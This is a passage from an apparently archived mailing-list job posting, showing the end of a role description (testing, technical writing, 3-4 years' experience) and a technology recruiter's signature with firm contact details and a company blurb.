application testing, and technical writing (user manuals, documentation.)  3-4 
years of experience – ideally.

Alicia N. Hamilton 
Director, Technology Contract Recruiting Services 

HireStrategy 

AOL IM - hireAliciaH

http://www.linkedin.com/in/aliciahamilton

 


 

[EMAIL PROTECTED]

www.hirestrategy.com 

 

11730 Plaza America Drive, Suite 340 
Reston, VA 20190 
(Office) 703-547-6729 
(Fax) 703-707-1836

HireStrategy provides consulting services and executive search solutions in the 
technology, sales, human resources, and accounting professions. HireStrategy, 
an Inc. 500 company, is ranked by The Washington Business Journal as the #1 
regional staffing firm in the Greater Washington area, and recognized by 
Washingtonian magazine, as one of Washington's Great Places to Work.


 



Archive: 
http://www.houseoffusion.com/groups/CF-Jobs-Talk/message.cfm/messageid:3910